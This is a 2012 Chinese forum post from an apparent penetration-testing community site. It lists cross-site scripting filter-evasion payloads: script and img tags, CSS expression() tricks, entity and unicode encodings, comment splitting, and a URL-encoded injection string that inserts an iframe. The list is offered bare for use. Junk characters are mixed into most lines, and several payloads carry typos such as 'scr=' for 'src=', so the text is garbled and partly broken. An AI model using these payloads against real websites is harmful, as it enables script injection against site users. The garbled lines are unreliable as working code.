中国网络渗透测试联盟

标题: xss [打印本页]
作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)
4 O/ p( M4 C1 M<img scr=javascript:alert("跨站")></img>3 F2 m. l4 t9 P: p+ b1 X
<img scr="javascrip&#116&#58 alert(/跨站/)></img># M& M) ~' B1 w- D+ \1 o0 [! w
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)7 i9 i" P/ y( O3 Q5 ?. W# F
<img scr="#" onerror=alert(/跨站/)></img>
( K9 j# ^$ g  p# R$ T<img scr="#" style="xss:expression(alert(/xss/));"></img>, s+ v- X1 V6 R9 ~2 G# @: a
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
3 W4 m, j% R* N4 Q# t& r) c( `: I<img src=vbscript:msgbox ("xss")></img>
& W% e1 r9 A) q& D& t, l: i# o' l<style> input {left:expression (alert('xss'))}</style>
* `6 K: r$ a$ H1 `/ |8 i9 i7 B<div style={left:expression (alert('xss'))}></div>
$ Y2 B. V: I9 _' U" c& B( u4 S- _2 g2 o<div style={left:exp/* */ression (alert('xss'))}></div>
5 a0 a* ]( R5 a) z5 z4 m+ X4 S<div style={left:\0065\0078ression (alert('xss'))}></div>
: \! |2 C7 p5 Q, C3 O* phtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
* \( v& z# b- J3 I, ^$ n9 Q) e( punicode <div style="{left:expRessioN (alert('xss'))}">
7 Q' y( [; L6 u5 J( O4 m' |+ m2 ]  p) ]/ W/ h% f$ T+ U% n
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["& z$ |4 k: f+ t; i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2